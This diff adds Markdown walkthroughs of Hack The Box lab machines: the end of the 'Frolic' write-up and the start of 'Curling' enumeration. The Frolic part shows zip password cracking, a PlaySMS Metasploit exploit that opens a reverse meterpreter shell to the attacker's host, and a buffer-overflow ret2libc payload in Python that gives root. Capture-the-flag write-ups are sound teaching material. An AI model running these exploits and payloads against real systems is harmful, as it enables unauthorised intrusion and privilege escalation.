+ [-v|--verbose] be more verbose
+ [-p|--init-password string] use string as initial password/file
+ [-l|--length min-max] check password with length min to max
+ [-u|--use-unzip] use unzip to weed out wrong passwords
+ [-m|--method num] use method number "num" (see below)
+ [-2|--modulo r/m] only calculcate 1/m of the password
+ file... the zipfiles to crack
+
+ methods compiled in (* = default):
+
+ 0: cpmask
+ 1: zip1
+ *2: zip2, USE_MULT_TAB
+
+we will be using the zip password cracking tool with the -u , -D and -p flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → fcrackzip -u -D -p rockyou.txt zipfile.zip
+
+
+ PASSWORD FOUND!!!!: pw == password
+
+
+It was short ! now we can extract the zip file contents with the 7z command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → 7z x zipfile.zip -ppassword
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 360 bytes (1 KiB)
+
+ Extracting archive: zipfile.zip
+ --
+ Path = zipfile.zip
+ Type = zip
+ Physical Size = 360
+
+
+ Would you like to replace the existing file:
+ Path: ./index.php
+ Size: 0 bytes
+ Modified: 2018-09-23 12:44:05
+ with the file from archive:
+ Path: index.php
+ Size: 617 bytes (1 KiB)
+ Modified: 2018-09-23 12:44:05
+ ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y
+
+ Everything is Ok
+
+ Size: 617
+ Compressed: 360
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → ls
+ index.php rockyou.txt zipfile.zip
+
+
+
+It contained a php file named "index" , let's see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php
+ 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a
+
+
+The contents of index.php seems to contain a hexadecimal encoded string. we will pipe the output of the cat command into the xxd command with the -r and -p flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php | xxd -r -p
+ KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
+ KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
+ K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
+ LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
+
+
+Looking at the results, we seem to have a base64 encoded string. we will pipe the output of the 2 previous commands into the base64 command with the -d flag.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php | xxd -r -p | base64 -d
+ +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+base64: invalid input
+
+
+Seems to be a brainfuck string ! however base64 doesn't like getting piped non-alphabet charcaters such as the endline special charcater, so we add the -i flag to bypass them.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php |xxd -r -p | base64 -d -i
+ +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
+ <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
+ ++..<
+
+
+Now that we have our full brainfuck encoded message , we will decode it using a brainfuck [interpreter](https://sange.fi/esoteric/brainfuck/impl/interp/i.html).
+
+
+
+Now we have a password we could work with ! Although we do not know where yet. Looking back at our dirsearch results we see that there the /dev/backup folder.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → curl -sk http://10.10.10.111:9999/dev/backup/
+ /playsms
+
+
+Yet another page ! let's browse to /playsms to see what we can work with.
+
+
+
+Seems like we have a login page ! let's test our "idkwhatispass" password with something trivial like root or admin
+
+ 
+
+Using the admin:idkwhatispass credentials, we have been able to log in ! We run a quick searchsploit command to see what exploits may be available for the playsms webservice
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → searchsploit playsms
+ ---------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------------------------------------------- ----------------------------------------
+ PlaySMS - 'import.php' (Authenticated) CSV File Upl | exploits/php/remote/44598.rb
+ PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execu | exploits/php/webapps/42003.txt
+ PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
+ PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenti | exploits/php/remote/44599.rb
+ PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
+ PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
+ PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
+ PlaySms 0.9.3 - Multiple Local/Remote File Inclusio | exploits/php/webapps/7687.txt
+ PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
+ PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
+ ---------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+It seems like we may be able to use a metasploit module to get onto the machine, let's fire up msfconsole and see what we could potentially work with.
+
+
+ msf5 > search playsms
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
+ 1 exploit/multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution
+
+
+ msf5 >
+
+
+
+ msf5 > use multi/http/playsms_uploadcsv_exec
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > show options
+
+ Module options (exploit/multi/http/playsms_uploadcsv_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD admin yes Password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Base playsms directory path
+ USERNAME admin yes Username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 PlaySMS 1.4
+
+
+
+Seems like we have to set the rhost, lhost, rport, targeturi and password options.
+
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
+ rhosts => 10.10.10.111
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.10.14.48
+ lhost => 10.10.14.48
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
+ rport => 9999
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms/
+ targeturi => /playsms/
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
+ password => idkwhatispass
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [+] Authentication successful: admin:idkwhatispass
+ [*] Sending stage (38288 bytes) to 10.10.10.111
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.111:41616) at 2019-12-05 11:04:30 +0100
+
+ meterpreter > sysinfo
+ Computer : frolic
+ OS : Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686
+ Meterpreter : php/linux
+
+
+it worked ! we have a meterpreter session onto the linux box. Let's create a shell and see if we can print out the user flag.
+
+
+
+ meterpreter > shell
+ Process 24934 created.
+ Channel 0 created.
+ whoami
+ www-data
+
+ cd ../../../../home
+
+ ls
+ ayush
+ sahay
+
+ cd ayush
+
+ ls
+ user.txt
+
+ cat user.txt
+ 2aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+Now in order to elevate our shell to administrating privileges, we first have to find binary files with the SUID bit active.$
+
+
+ find / -perm -4000 2>/dev/null
+ /sbin/mount.cifs
+ /bin/mount
+ /bin/ping6
+ /bin/fusermount
+ /bin/ping
+ /bin/umount
+ /bin/su
+ /bin/ntfs-3g
+
+ **/home/ayush/.binary/rop**
+
+ /usr/bin/passwd
+ /usr/bin/gpasswd
+ /usr/bin/newgrp
+ /usr/bin/newuidmap
+ /usr/bin/pkexec
+ /usr/bin/at
+ /usr/bin/sudo
+ /usr/bin/newgidmap
+ /usr/bin/chsh
+
+
+
+There seems to be something interesting in /home/ayush/.binary/rop ! Let's first spawn a TTY Shell , then see what we can work with in the .binary directory
+
+
+ python -c 'import pty; pty.spawn("/bin/sh")'
+ $ cd /home/ayush
+ cd ayush
+
+ $ ls -la
+ ls -la
+ total 36
+ drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 .
+ drwxr-xr-x 4 root root 4096 Sep 23 2018 ..
+ -rw------- 1 ayush ayush 2781 Sep 25 2018 .bash_history
+ -rw-r--r-- 1 ayush ayush 220 Sep 23 2018 .bash_logout
+ -rw-r--r-- 1 ayush ayush 3771 Sep 23 2018 .bashrc
+ drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .binary
+ -rw-r--r-- 1 ayush ayush 655 Sep 23 2018 .profile
+ -rw------- 1 ayush ayush 965 Sep 25 2018 .viminfo
+ -rwxr-xr-x 1 ayush ayush 33 Sep 25 2018 user.txt
+
+ $ cd .binary
+ cd .binary
+
+ $ ls
+ ls
+ rop
+
+ $ ls -la
+ ls -la
+ total 16
+ drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .
+ drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 ..
+ -rwsr-xr-x 1 root root 7480 Sep 25 2018 rop
+
+ $ ./rop
+ ./rop
+ [*] Usage: program <****message>
+
+ $ ./rop nihilist
+ ./rop nihilist
+ [+] Message sent: nihilist$
+
+ $ ./rop 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ ./rop 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ Segmentation fault (core dumped)
+
+ $ cat /proc/sys/kernel/randomize_va_space
+ cat /proc/sys/kernel/randomize_va_space
+ 0
+
+As you can see, the rop binary possess root privileges, and it seems that there may be a buffer overflow vulnerability that we can work with. Also note that ASLR is disabled (0) on the machine which means that the buffer overflow vuln could potentially give us a privilege escalation. let's download the rop binary locally first, we will simply use python's SimpleHTTPServer that is present on the machine in combination with wget on our local machine.
+
+_Terminal 1:_
+
+
+ $ ls
+ ls
+ rop
+
+ $ python -m SimpleHTTPServer
+ python -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+ 10.10.14.48 - - [05/Dec/2019 15:53:19] "GET /rop HTTP/1.1" 200
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → wget 10.10.10.111:8000/rop
+ --2019-12-05 11:22:47-- http://10.10.10.111:8000/rop
+ Connecting to 10.10.10.111:8000... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7480 (7.3K) [application/octet-stream]
+ Saving to: ‘rop’
+
+ rop 100%[==============================================>] 7.30K --.-KB/s in 0s
+
+ 2019-12-05 11:22:47 (171 MB/s) - ‘rop’ saved [7480/7480]
+
+
+Now that we have the binary saved locally, let's see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → locate pattern_create
+ /opt/metasploit/.tools/exploit/pattern_create.rb
+ /opt/metasploit/tools/exploit/pattern_create.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → /opt/metasploit/tools/exploit/pattern_create.rb -l 128
+ WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.10
+ Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+
+
+Now that we have
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → gdb -q rop
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 79 commands loaded for GDB 8.3.1 using Python engine 3.8
+ [*] 1 command could not be loaded, run `gef missing` to know why.
+ Reading symbols from rop...
+ (No debugging symbols found in rop)
+ gef➤ checksec
+ [+] checksec for '/home/nihilist/_HTB/Frolic/rop'
+ Canary : No
+ NX : Yes
+ PIE : No
+ Fortify : No
+ RelRO : Partial
+
+
+
+one thing to note is that when we run the checksec command onto the rop binary within GEF, we see that the NX bit is enabled, which means that we won't be able to execute shellcode on the stack.
+
+
+
+ gef➤ run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+ Starting program: /home/nihilist/_HTB/Frolic/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x62413762 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x80
+ $ebx : 0xffffd2c0 → "4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ $ecx : 0xffffd220 → 0xf7f8ece0 → 0xfbad2a84
+ $edx : 0xffffd2d8 → 0xf7f8de00 → 0x00000000
+ $esp : 0xffffd290 → "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A[...]"
+ $ebp : 0x41366241 ("Ab6A"?)
+ $esi : 0xf7f8de24 → 0x001e2d2c (",-"?)
+ $edi : 0xf7f8de24 → 0x001e2d2c (",-"?)
+ $eip : 0x62413762 ("b7Ab"?)
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd290│+0x0000: "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A[...]" ← $esp
+ 0xffffd294│+0x0004: "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad[...]"
+ 0xffffd298│+0x0008: "c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7[...]"
+ 0xffffd29c│+0x000c: "2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A[...]"
+ 0xffffd2a0│+0x0010: "Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae[...]"
+ 0xffffd2a4│+0x0014: "c5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1[...]"
+ 0xffffd2a8│+0x0018: "6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ 0xffffd2ac│+0x001c: "Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ ─────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ [!] Cannot disassemble from $PC
+ [!] Cannot access memory at address 0x62413762
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "rop", stopped, reason: SIGSEGV
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+looking at the results, we see that the program crashes with EIP set to 0x62413762. let's run pattern_offset.rb to find the offset of 0x62413762.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → locate pattern_offset.rb
+ /opt/metasploit/.tools/exploit/pattern_offset.rb
+ /opt/metasploit/tools/exploit/pattern_offset.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413762
+ WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.10
+ [*] Exact match at offset 52
+
+
+We seem to have an exact match at offset 52! back to our meterpreter session, we use either curl or wget to download the libc library locally.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → nc -lvnp 4444 > libc
+
+ listening on [any] 4444 ...
+ connect to [10.10.14.23] from (UNKNOWN) [10.10.10.111] 59480
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → one_gadget -f libc rop
+
+ 0x3ac5c execve("/bin/sh", esp+0x28, environ)
+ constraints:
+ esi is the GOT address of libc
+ [esp+0x28] == NULL
+
+
+
+now that we have a gadget at 0x3ac5c, we should be able to get a shell. Although we need to find libc's base address, for that matter we will use the ldd command.
+
+
+ $ ldd rop
+ ldd rop
+ linux-gate.so.1 => (0xb7fda000)
+ libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
+ /lib/ld-linux.so.2 (0xb7fdb000)
+
+
+And that's all we need ! we have the base address 0xb7e19000, now we are ready to write our exploit.
+
+
+ from pwn import *
+
+ payload = "A" * 52 + p32(0xb7e19000+0x3ac5c)
+
+ print payload
+
+
+Running the exploit locally for it to generate the payload, we will then upload the payload onto the machine and it will give us a privilege escalation.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → python exploit.py > payload
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → ls
+ exploit.py msf rockyou.txt zipfile.zip
+ index.php payload rop
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → python2 -m SimpleHTTPServer 9001
+ Serving HTTP on 0.0.0.0 port 9001 ...
+ 10.10.10.111 - - [05/Dec/2019 12:40:58] "GET /payload HTTP/1.1" 200 -
+
+
+
+ $wget http://10.10.14.48:9001/payload
+ --2019-12-05 12:42:22-- http://10.10.14.48:9001/payload
+ Connecting to 10.10.14.48:9001... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 0 [application/octet-stream]
+ Saving to: ‘payload.1’
+
+ payload.1 [ <=> ] 0 --.-KB/s in 0s
+
+ 2019-12-05 12:40:58 (0.00 B/s) - ‘payload.1’ saved
+
+ $ /home/ayush/.binary/rop $(cat payload.1)
+ /home/ayush/.binary/rop $(cat payload.1)
+
+ # cat /root/root.txt
+ cat root.txt
+ 85XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+Another even quicker way to get the root flag is to pass the addresses of SYSTEM, exit and /bin/sh directly to the rop binary itself.
+
+
+
+ $ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
+ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
+
+ # whoami
+ whoami
+ root
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ 85XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/24.md b/Easy/24.md
new file mode 100644
index 0000000..e30377f
--- /dev/null
+++ b/Easy/24.md
@@ -0,0 +1,436 @@
+# Curling Writeup
+
+
+
+## Introduction :
+
+Curling is an easy Linux box that was released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nmap -F 10.10.10.150 --top-ports 65535
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 15:48 CET
+ Nmap scan report for 10.10.10.150
+ Host is up (0.038s latency).
+ Not shown: 8318 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds
+
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nmap -sC -sV -p22,80 10.10.10.150
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 15:51 CET
+ Nmap scan report for 10.10.10.150
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
+ | 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
+ |_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-generator: Joomla! - Open Source Content Management
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Home
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.41 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap picked up the 80th port running a Joomla! webservice. We will run a dirsearch command in the background while we start to enumerate this port.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/ -r -e php -t 50 -x 403
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → searchsploit Joomla! | wc -l
+ 1421
+
+
+Joomla! is a well known service with more than a thousand exploits available.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/
+ No extension specified. You must specify at least one extension or try using default extension list.
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → dirsearch -u http://10.10.10.150/ -r -e php -t 50 -x 403
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 50 | Wordlist size: 6027 | Recursion level: 1
+
+ Error Log: /root/.dirsearch/logs/errors-19-12-05_15-52-05.log
+
+ Target: http://10.10.10.150/
+
+ [15:52:05] Starting:
+ [15:52:12] 301 - 320B - /administrator -> http://10.10.10.150/administrator/
+ [15:52:12] 200 - 5KB - /administrator/
+ [15:52:12] 301 - 325B - /administrator/logs -> http://10.10.10.150/administrator/logs/
+ [15:52:12] 200 - 5KB - /administrator/index.php
+ [15:52:14] 301 - 310B - /bin -> http://10.10.10.150/bin/
+ [15:52:14] 200 - 31B - /bin/
+ [15:52:14] 301 - 312B - /cache -> http://10.10.10.150/cache/
+ [15:52:14] 200 - 31B - /cache/
+ [15:52:15] 301 - 317B - /components -> http://10.10.10.150/components/
+ [15:52:15] 200 - 0B - /configuration.php
+ [15:52:18] 200 - 3KB - /htaccess.txt
+ [15:52:18] 301 - 313B - /images -> http://10.10.10.150/images/
+ [15:52:18] 200 - 31B - /includes/
+ [15:52:18] 301 - 315B - /includes -> http://10.10.10.150/includes/
+ [15:52:18] 200 - 14KB - /index.php
+ [15:52:19] 301 - 315B - /language -> http://10.10.10.150/language/
+ [15:52:19] 301 - 316B - /libraries -> http://10.10.10.150/libraries/
+ [15:52:19] 200 - 18KB - /LICENSE.txt
+ [15:52:20] 301 - 312B - /media -> http://10.10.10.150/media/
+ [15:52:21] 301 - 314B - /modules -> http://10.10.10.150/modules/
+ [15:52:23] 301 - 314B - /plugins -> http://10.10.10.150/plugins/
+ [15:52:23] 200 - 5KB - /README.txt
+ [15:52:26] 301 - 316B - /templates -> http://10.10.10.150/templates/
+ [15:52:26] 200 - 31B - /templates/
+ [15:52:26] 200 - 31B - /tmp/
+ [15:52:26] 301 - 310B - /tmp -> http://10.10.10.150/tmp/
+ [15:52:27] 200 - 2KB - /web.config.txt
+ [15:52:28] Starting: administrator/
+ [15:52:35] 301 - 326B - /administrator/cache -> http://10.10.10.150/administrator/cache/
+ [15:52:35] 200 - 31B - /administrator/cache/
+ [15:52:36] 301 - 331B - /administrator/components -> http://10.10.10.150/administrator/components/
+ [15:52:39] 301 - 325B - /administrator/help -> http://10.10.10.150/administrator/help/
+ [15:52:39] 200 - 1KB - /administrator/help/
+ [15:52:40] 301 - 329B - /administrator/includes -> http://10.10.10.150/administrator/includes/
+ [15:52:40] 200 - 2KB - /administrator/includes/
+ [15:52:40] 200 - 5KB - /administrator/index.php
+ [15:52:40] 200 - 5KB - /administrator/index.php/login/
+ [15:52:41] 301 - 329B - /administrator/language -> http://10.10.10.150/administrator/language/
+ [15:52:41] 301 - 325B - /administrator/logs -> http://10.10.10.150/administrator/logs/
+ [15:52:41] 200 - 31B - /administrator/logs/
+ [15:52:42] 301 - 328B - /administrator/modules -> http://10.10.10.150/administrator/modules/
+ [15:52:47] 301 - 330B - /administrator/templates -> http://10.10.10.150/administrator/templates/
+ [15:52:47] 200 - 1KB - /administrator/templates/
+ [15:52:49] Starting: bin/
+ [15:53:01] 200 - 31B - /bin/index.md
+ [15:53:10] Starting: cache/
+ [15:53:23] 200 - 31B - /cache/index.md
+ [15:53:31] Starting: components/
+ [15:53:44] 200 - 31B - /components/index.md
+ [15:53:53] Starting: images/
+ [15:54:00] 301 - 321B - /images/banners -> http://10.10.10.150/images/banners/
+ [15:54:00] 200 - 2KB - /images/banners/
+ [15:54:05] 301 - 321B - /images/headers -> http://10.10.10.150/images/headers/
+ [15:54:05] 200 - 31B - /images/index.md
+ [15:54:14] Starting: includes/
+ [15:54:27] 200 - 31B - /includes/index.md
+ [15:54:36] Starting: language/
+ [15:54:48] 200 - 31B - /language/index.md
+ [15:54:57] Starting: libraries/
+ [15:55:06] 301 - 320B - /libraries/cms -> http://10.10.10.150/libraries/cms/
+ [15:55:06] 200 - 1KB - /libraries/cms/
+ [15:55:10] 200 - 0B - /libraries/import.php
+ [15:55:10] 200 - 31B - /libraries/index.md
+ [15:55:10] 301 - 323B - /libraries/joomla -> http://10.10.10.150/libraries/joomla/
+ [15:55:17] 301 - 320B - /libraries/src -> http://10.10.10.150/libraries/src/
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_namespaces.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_psr4.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_static.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/ClassLoader.php
+ [15:55:18] 200 - 1KB - /libraries/vendor/composer/LICENSE
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_classmap.php
+ [15:55:18] 200 - 0B - /libraries/vendor/autoload.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_real.php
+ [15:55:18] 200 - 0B - /libraries/vendor/composer/autoload_files.php
+ [15:55:19] 200 - 47KB - /libraries/vendor/composer/installed.json
+ [15:55:19] Starting: media/
